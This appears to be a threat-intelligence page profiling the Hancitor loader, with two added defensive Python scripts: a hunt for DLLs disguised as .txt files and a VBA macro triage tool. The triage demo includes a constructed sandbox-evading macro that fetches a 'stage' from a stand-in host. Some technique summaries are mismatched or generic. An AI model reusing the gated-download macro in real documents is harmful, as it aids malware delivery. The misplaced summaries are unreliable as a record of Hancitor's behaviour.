Hancitor
Hancitor, also known as Chanitor and Tordal, is a malware loader/dropper primarily distributed through malspam and phishing emails containing malicious attachments or links. Observed delivery chains include malicious Microsoft Word documents that prompt victims to enable macros, macro-based Excel attachments, and email links that redirect to ZIP archives containing VBS files. Hancitor has used PowerShell to execute commands, and its document macros have included an anti-analysis check that verifies the presence of an ActiveDocument shape object in the lure document before downloading additional payloads. It has also used the Windows APIs CallWindowProc and EnumResourceTypesA to interpret and execute shellcode.
Hancitor commonly serves as an initial-stage loader for follow-on malware. Reported secondary payloads include Pony, Evil Pony, Zeus Panda Banker, Ursnif, Cobalt Strike, Mars Stealer, and Ficker Stealer. One documented infection chain involved Hancitor dropping the final Ficker payload via process hollowing. Recent reporting also notes Hancitor infections pushing Mars Stealer EXE files as follow-up malware.
Operationally, Hancitor has been associated with phishing campaigns using DocuSign-themed lures, spoofed sender addresses, and malicious links. In one documented 2019 campaign, links redirected to a ZIP archive containing a VBS file, and the Hancitor DLL was written to the victim's AppData\Local\Temp directory with a .txt extension. In that case, follow-on malware included Ursnif, and sandbox detonation also showed Cobalt Strike-related traffic. Persistence in the observed infection was attributed to Ursnif rather than Hancitor itself.
Hancitor has also been referenced in reporting on Nebulous Mantis / STORM-0978 / UNC2596 / Tropical Scorpius / Cuba activity, where the group reportedly used Hancitor since 2019 before pivoting to RomCom in mid-2022. Mandiant additionally reported overlaps between CHANITOR-related operations and COLDDRAW incidents, including shared infrastructure and tooling, though direct CHANITOR-to-COLDDRAW delivery was not observed.
High-confidence indicators and behaviors directly mentioned in the source content include phishing-email delivery, malicious Word and Excel macro documents, malicious links leading to ZIP/VBS payloads, PowerShell execution, macro-based anti-analysis via ActiveDocument shape-object checks, shellcode execution via CallWindowProc and EnumResourceTypesA, storage of a Hancitor DLL with a .txt extension in AppData\Local\Temp, and use as a loader for payloads such as Pony, Evil Pony, Ursnif, Cobalt Strike, Mars Stealer, and Ficker Stealer.
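The .txt-extension DLL artifact listed above is cheap to hunt for with nothing more than a PE header parse. The following Python is an added example, not code from the original reporting or from any vendor: it walks a directory (in practice %LOCALAPPDATA%\Temp), reads the DOS and COFF headers of every file whose extension is not a normal executable extension, and reports any that carry a valid PE signature, separating DLLs from EXEs via the IMAGE_FILE_DLL characteristics flag. The scratch directory contents, the file name stage1.txt and the minimal PE headers it writes are constructed for the demo.

```python
import struct
import tempfile
from pathlib import Path

IMAGE_FILE_DLL = 0x2000            # COFF Characteristics flag set on DLL images
PE_SIGNATURE = b"PE\x00\x00"
# Extensions where a PE header is expected; a PE under any other extension is suspect.
EXPECTED_PE_SUFFIXES = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv", ".mui"}


def pe_characteristics(data: bytes):
    """Return the COFF Characteristics field if `data` starts with a well-formed
    MZ/PE header, otherwise None.  Only the first few KB of the file are needed."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # 4-byte signature followed by the 20-byte COFF file header.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return None
    # Signature(4) Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    return struct.unpack_from("<H", data, e_lfanew + 22)[0]


def classify_file(path: Path):
    """'dll', 'exe', or None when the file is not a PE image."""
    with path.open("rb") as fh:
        chars = pe_characteristics(fh.read(4096))
    if chars is None:
        return None
    return "dll" if chars & IMAGE_FILE_DLL else "exe"


def hunt_masquerading_pe(root) -> list:
    """Walk `root` (e.g. %LOCALAPPDATA%\\Temp) and return (name, kind) for every
    file that carries a PE header but hides behind a non-executable extension."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file() or p.suffix.lower() in EXPECTED_PE_SUFFIXES:
            continue
        kind = classify_file(p)
        if kind:
            hits.append((p.name, kind))
    return hits


def make_minimal_pe(is_dll: bool) -> bytes:
    """Constructed minimal MZ+PE header (not a real Hancitor sample) used to
    exercise the hunt offline: no sections, no optional header."""
    buf = bytearray(0x40 + 24)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew: PE header at 0x40
    buf[0x40:0x44] = PE_SIGNATURE
    characteristics = 0x0002 | (IMAGE_FILE_DLL if is_dll else 0)  # EXECUTABLE_IMAGE (+DLL)
    struct.pack_into("<HHIIIHH", buf, 0x44, 0x8664, 0, 0, 0, 0, 0, characteristics)
    return bytes(buf)


def demo() -> list:
    """Build a scratch 'Temp' directory of constructed files and run the hunt."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "notes.txt").write_bytes(b"just a text file\n")          # benign
        (root / "report.txt").write_bytes(b"MZ" + b"A" * 100)            # MZ but no PE header
        (root / "stage1.txt").write_bytes(make_minimal_pe(is_dll=True))  # DLL hidden as .txt
        (root / "tool.exe").write_bytes(make_minimal_pe(is_dll=False))   # expected PE, ignored
        return hunt_masquerading_pe(root)


if __name__ == "__main__":
    for name, kind in demo():
        print(f"SUSPECT {kind.upper()} stored under a non-executable extension: {name}")
```

Point it at a live host with hunt_masquerading_pe(Path.home() / "AppData" / "Local" / "Temp"). A clean result does not clear the host: a loader can sit on disk encrypted and be decoded only in memory, so pair this on-disk check with the process-level behaviors the reporting documents (PowerShell spawned from an Office process, and shellcode dispatched through CallWindowProc or EnumResourceTypesA callbacks).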
Groups observed using it
1 distinct threat actor attributed by public researchers.
"Initially relying on the Hancitor loader, the group pivoted in mid-2022 to RomCom..."
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
The content repeatedly references phishing emails with embedded malicious links/URLs used to deliver malware or lure victims to malicious content (e.g., FIN7 broad phishing campaigns using malicious links; Emotet delivered by phishing emails containing links).
The content repeatedly describes threat actors and malware being delivered through phishing or spearphishing emails containing malicious attachments such as Microsoft Office documents, PDFs, RAR/ZIP archives, CHM, ISO, IMG, HTA, LNK, and executable files disguised as documents.
Multiple actors and malware families are described as being delivered via spearphishing/phishing emails containing malicious links (e.g., APT28 used URL shorteners to redirect to credential harvesting sites; APT29 used links to ZIP files; APT33 used links to .hta files; BlackTech used links to cloud services; Wizard Spider used links to Google Drive/free file hosting).
Execution
6 techniques
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
The content repeatedly mentions malicious macros in Word/Excel documents, such as "enable macros," "embedded macros," and "macro-enabled documents."
The content repeatedly describes victims being lured into opening malicious attachments, enabling macros, launching installers, clicking embedded files/links, or otherwise directly executing malicious content.
"when opened..." and "Once the fake DocuSign document is opened and its malicious macro code is allowed to run"
Persistence
2 techniques
Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
2 techniques
"injects the final payload using a technique called process hollowing"
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Stealth
8 techniques
The content repeatedly describes malware and threat actors using obfuscated code, encrypted strings, Base64/XOR/RC4/AES encoding, VMProtect/ConfuserEx/SmartAssembly, stack strings, control-flow flattening, opaque predicates, and hidden payloads to evade analysis and detection.
"injects the final payload using a technique called process hollowing"
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it. Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads. Operation Spalax threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.
Defense Impairment
1 technique
Discovery
2 techniques
CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it. Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads. Operation Spalax threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.
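The shape-object check listed under both Stealth and Discovery works because many analysis pipelines extract the VBA and run it outside the original lure, or detonate a rebuilt document, where ActiveDocument.Shapes is empty; the macro then exits before it ever touches the network, and the sandbox sees a harmless document. A static triage that flags exactly that gating pattern is shown below as an added Python example. It is not Hancitor's macro and not code from the original reporting; the three VBA fragments, the host name example.invalid and the regexes are constructed for the demo.

```python
import re

# --- Constructed VBA fragments for the demo (not Hancitor's actual macro) ---
SAMPLE_GUARDED = """
Sub AutoOpen()
    ' bail out unless the lure document still carries its shape object
    If ActiveDocument.Shapes.Count < 1 Then
        Exit Sub
    End If
    Set req = CreateObject("MSXML2.XMLHTTP")
    req.Open "GET", "http://example.invalid/stage", False
End Sub
"""

SAMPLE_UNGUARDED = """
Sub Document_Open()
    Set req = CreateObject("MSXML2.XMLHTTP")
End Sub
"""

SAMPLE_BENIGN = """
Sub FormatTable()
    ActiveDocument.Tables(1).Borders.Enable = True
End Sub
"""

AUTO_EXEC = re.compile(r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I)
SHAPE_GUARD = re.compile(r"ActiveDocument\.Shapes\b", re.I)
EXIT_EARLY = re.compile(r"\bExit\s+(Sub|Function)\b", re.I)
# Primitives a loader macro needs to fetch or run a second stage.
NET_OR_EXEC = re.compile(
    r"(URLDownloadToFile|XMLHTTP|WinHttpRequest|powershell|\bShell\b)", re.I)


def triage_macro(vba: str) -> dict:
    """Static flags for one VBA module.  'guarded_download' is the pattern from
    the reporting: a shape-object check that can exit the routine *before* the
    first network or execution call is reached."""
    guard = SHAPE_GUARD.search(vba)
    action = NET_OR_EXEC.search(vba)
    guarded = bool(
        guard and action and guard.start() < action.start()
        and EXIT_EARLY.search(vba, guard.end(), action.start())
    )
    return {
        "auto_exec": bool(AUTO_EXEC.search(vba)),
        "shape_guard": guard is not None,
        "net_or_exec": action is not None,
        "guarded_download": guarded,
    }


def verdict(vba: str) -> str:
    """high: a sandbox-evasion gate precedes a fetch/exec call;
    medium: an auto-exec entry point plus a fetch/exec call; low: otherwise."""
    flags = triage_macro(vba)
    if flags["guarded_download"]:
        return "high"
    if flags["auto_exec"] and flags["net_or_exec"]:
        return "medium"
    return "low"


if __name__ == "__main__":
    for name, src in [("guarded", SAMPLE_GUARDED),
                      ("unguarded", SAMPLE_UNGUARDED),
                      ("benign", SAMPLE_BENIGN)]:
        print(f"{name:10s} -> {verdict(src)}  {triage_macro(src)}")
```

Feed it one module at a time from olevba (oletools) output. A "high" verdict is the cue to detonate the original document, with its shape intact, in an analysis VM rather than the extracted macro: that is the only way the guard passes and the download stage becomes observable.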
Command and Control
2 techniques
In 2017, nearly every 7th SBL listing that Spamhaus issued was for a botnet controller. The number of such botnet "C&C" listings increased by a massive 32% in 2017.
"install a Windows binary from an attacker-controlled server" and "receive a malicious URL containing a sample of Ficker to download"
Recent activity
27 sources tracked across advisories, community write-ups, and news.
Loader used earlier in the intrusion chain prior to the group’s pivot to RomCom; used to deliver subsequent payloads.
Malware family used by the group since 2019 as part of their intrusion activity; the content does not provide additional functional detail beyond its use in targeting campaigns.
Malware loader used in earlier iterations of the campaign to deliver subsequent payloads.
Loader malware used to deliver other payloads, often used in campaigns to distribute ransomware and other threats.